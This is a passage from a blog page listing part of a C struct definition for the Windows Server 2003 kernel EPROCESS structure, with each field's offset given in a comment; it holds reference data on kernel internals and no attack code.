/*+0x190*/ PPEB Peb;
/*+0x194*/ EX_FAST_REF PrefetchTrace;
/*+0x198*/ LARGE_INTEGER ReadOperationCount;
/*+0x1a0*/ LARGE_INTEGER WriteOperationCount;
/*+0x1a8*/ LARGE_INTEGER OtherOperationCount;
/*+0x1b0*/ LARGE_INTEGER ReadTransferCount;
/*+0x1b8*/ LARGE_INTEGER WriteTransferCount;
/*+0x1c0*/ LARGE_INTEGER OtherTransferCount;
/*+0x1c8*/ ULONG CommitChargeLimit;
/*+0x1cc*/ ULONG CommitChargePeak;
/*+0x1d0*/ PVOID AweInfo;
/*+0x1d4*/ SE_AUDIT_PROCESS_CREATION_INFO SeAuditProcessCreationInfo;
/*+0x1d8*/ MMSUPPORT_2K3 Vm;
/*+0x238*/ LIST_ENTRY MmProcessLinks;
/*+0x240*/ ULONG ModifiedPageCount;
/*+0x244*/ ULONG JobStatus;
union{
/*+0x248*/ ULONG Flags;
struct{
/*+0x248*/ ULONG CreateReported : 1;
/*+0x248*/ ULONG NoDebugInherit : 1;
/*+0x248*/ ULONG ProcessExiting : 1;
/*+0x248*/ ULONG ProcessDelete : 1;
/*+0x248*/ ULONG Wow64SplitPages : 1;
/*+0x248*/ ULONG VmDeleted : 1;
/*+0x248*/ ULONG OutswapEnabled : 1;
/*+0x248*/ ULONG Outswapped : 1;
/*+0x248*/ ULONG ForkFailed : 1;
/*+0x248*/ ULONG Wow64VaSpace4Gb : 1;
/*+0x248*/ ULONG AddressSpaceInitialized :2;
/*+0x248*/ ULONG SetTimerResolution : 1;
/*+0x248*/ ULONG BreakOnTermination : 1;
/*+0x248*/ ULONG SessionCreationUnderway :1;
/*+0x248*/ ULONG WriteWatch : 1;
/*+0x248*/ ULONG ProcessInSession : 1;
/*+0x248*/ ULONG OverrideAddressSpace : 1;
/*+0x248*/ ULONG HasAddressSpace : 1;
/*+0x248*/ ULONG LaunchPrefetched : 1;
/*+0x248*/ ULONG InjectInpageErrors : 1;
/*+0x248*/ ULONG VmTopDown : 1;
/*+0x248*/ ULONG ImageNotifyDone : 1;
/*+0x248*/ ULONG PdeUpdateNeeded : 1;
/*+0x248*/ ULONG VdmAllowed : 1;
/*+0x248*/ ULONG Unused : 7;
};
};
/*+0x24c*/ NTSTATUS ExitStatus;
/*+0x250*/ USHORT NextPageColor;
union {
struct {
/*+0x252*/ UCHAR SubSystemMinorVersion;
/*+0x253*/ UCHAR SubSystemMajorVersion;
};
/*+0x252*/ USHORT SubSystemVersion;
};
/*+0x254*/ UCHAR PriorityClass;
/*+0x258*/ MM_AVL_TABLE VadRoot;
} EPROCESS_2K3, *PEPROCESS_2K3;
Subscribe to:
Posts (Atom)